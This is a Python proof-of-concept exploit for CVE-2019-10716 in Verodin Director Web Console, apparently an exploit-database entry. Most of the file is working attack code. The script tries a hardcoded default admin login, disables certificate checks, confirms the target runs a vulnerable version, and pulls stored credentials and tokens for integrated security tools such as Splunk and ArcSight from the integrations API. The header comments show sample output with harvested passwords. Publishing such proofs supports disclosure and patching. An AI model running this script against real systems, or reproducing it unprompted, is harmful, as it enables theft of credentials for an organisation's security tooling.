1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 |
#Exploit Title: Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC) #Discovery Date: 2019-01-31 #Exploit Author: Nolan B. Kennedy (nxkennedy) #Vendor Homepage: https://www.verodin.com/ #Software Link : https://www.verodin.com/demo-request/demo-request-form #Tested Versions: v3.5.1.0, v3.5.2.0, v3.5.3.1 #Tested On: Windows #CVE: CVE-2019-10716 #Vulnerability Type: Sensitive Data Disclosure ### # Description: Verodin Director's REST API allows authenticated users to query the configuration # details, which include credentials, of any 50+ possible integrated security tools (e.g. Splunk, ArcSight, Palo Alto, AWS Cloud Trail). # Fortunately for attackers, members of 3 out of the 4 user groups in the Director can query this info (Users, Power Users, System Admin). # # API Request: GET https://<director-ip>/integrations.json # # Usage: python3 script.py # # Example Output: # # -- VERODIN DIRECTOR WEB CONSOLE < V3.5.4.0 - REMOTE AUTHENTICATED PASSWORD DISCLOSURE (POC) -- # -- Author: Nolan B. Kennedy (nxkennedy) -- # # # [+] Director Version # ===================== # [*] Detected version 3.5.1.0 is VULNERABLE! :) # # # [+] Account Permissions # ======================== # [*] "admin@verodin.com" is a member of "System Admin" # # # [+] Verodin Integrations # ========================= # [*] Product: splunk # [*] Username: splunk_svc_acct # [*] Misc (may include credentials): [{'scheme': 'https', 'basic': False, 'password': 'Sup3rP@ssw0rd', # 'port': 8089, 'host': '10.0.0.6', 'username': 'splunk_svc_acct'}, # {'proxy_hash': None}] # # [*] Product: arcsight # [*] Username: arcsight_admin # [*] Misc (may include credentials): ['10.0.0.7', 8443, 'https', 'arcsight_admin', 'Sup3rP@ssw0rd', # "/All Filters/Personal/integration_user's filters/Verodin Filter", 'Verodin Query Viewer', 60] # # [+] Done! ### import base64 from distutils.version import LooseVersion import json import re import ssl from sys import exit from time import sleep import urllib.request verodin_ip = '0.0.0.0' # Default System Admin creds. Worth a try. username = 'admin@verodin.com' password = 'Ver0d!nP@$$' base_url = 'https://{}'.format(verodin_ip) fixed_version = '3.5.4.0' # We'll be making 3 different requests so we need a web handling function def requests(target, html=False): url = base_url + target context = ssl._create_unverified_context() # so we don't get an ssl cert error req= urllib.request.Request(url) credentials = ('{}:{}'.format(username, password)) encoded_credentials = base64.b64encode(credentials.encode('ascii')) req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii")) # use %s instead of format because errors r = urllib.request.urlopen(req, context=context) content = r.read().decode('utf-8') if r.getcode() == 200: # we don't always get a 401 if auth fails if 'Cookies need to be enabled' in content: print('[!] Failed to retrieve data: Credentials incorrect/invalid') print() print('[!] Exiting...') exit(1) elif html: blob = content else: blob = json.loads(content) return blob elif r.getcode() == 401: print('[!] Failed to retrieve data: Credentials incorrect/invalid') print() print('[!] Exiting...') exit(1) else: print('[!] ERROR: Status Code {}'.format(r.getcode())) exit(1) # Do we have permissions to retrieve the creds? def getUserPerms(): target = '/users/user_prefs.json' r = requests(target) # returns a single json dict print('\n[+] Account Permissions') print('========================') group_id = r['user_group_id'] roles = {'Reporting': 4, 'Users': 3, 'Power Users': 2, 'System Admin': 1} for role,value in roles.items(): if group_id == value: print('[*] "{}" is a member of "{}"'.format(username, role)) print() if group_id == 4: print('[!] This account does not have sufficient privs. You need "Users" or higher.') print() print('[!] Exiting...') exit(1) sleep(0.5) # We need to verify the target Director is running a vulnerable version def checkVuln(): target = '/settings/system' r = requests(target, html=True) field = re.search(r'Director\sVersion:.*', r) version = field.group().split('<')[0].split(" ")[2] print('\n[+] Director Version') print('=====================') if LooseVersion(version) < LooseVersion(fixed_version): print('[*] Detected version {} is VULNERABLE! :)'.format(version)) print() else: print('[!] Detected version {} is not vulnerable. Must be < {}'.format(version, fixed_version)) print() print('[!] Exiting...') sleep(0.5) # Where we parse out any creds or other useful info def getLoot(): target = '/integrations.json' r = requests(target)# a list of json dicts print('\n[+] Verodin Integrations') print('=========================') if not r: print('[+] Dang! No integrations configured in this Director :(') print() else: for integration in r: product = integration['package_name'] # constant key misc = integration.get('new_client_args') # we use .get to return a None type if the key doesn't exist user = integration.get('username') passw = integration.get('password') token = integration.get('auth_token') print('[*] Product: {}'.format(product)) if user: print('[*] Username: {}'.format(user)) if passw: print('[*] Password: {}'.format(passw)) if token and token is not 'null': print('[*] Auth Token: {}'.format(token)) if misc: print('[*] Misc (may include credentials): {}'.format(misc)) print() sleep(0.5) def main(): print('\n-- Verodin Director Web Console < v3.5.4.0 - Remote Authenticated Password Disclosure (PoC) --'.upper()) print('-- Author: Nolan B. Kennedy (nxkennedy) --') print() checkVuln() getUserPerms() getLoot() print('[+] Done!') if __name__ == '__main__': main() |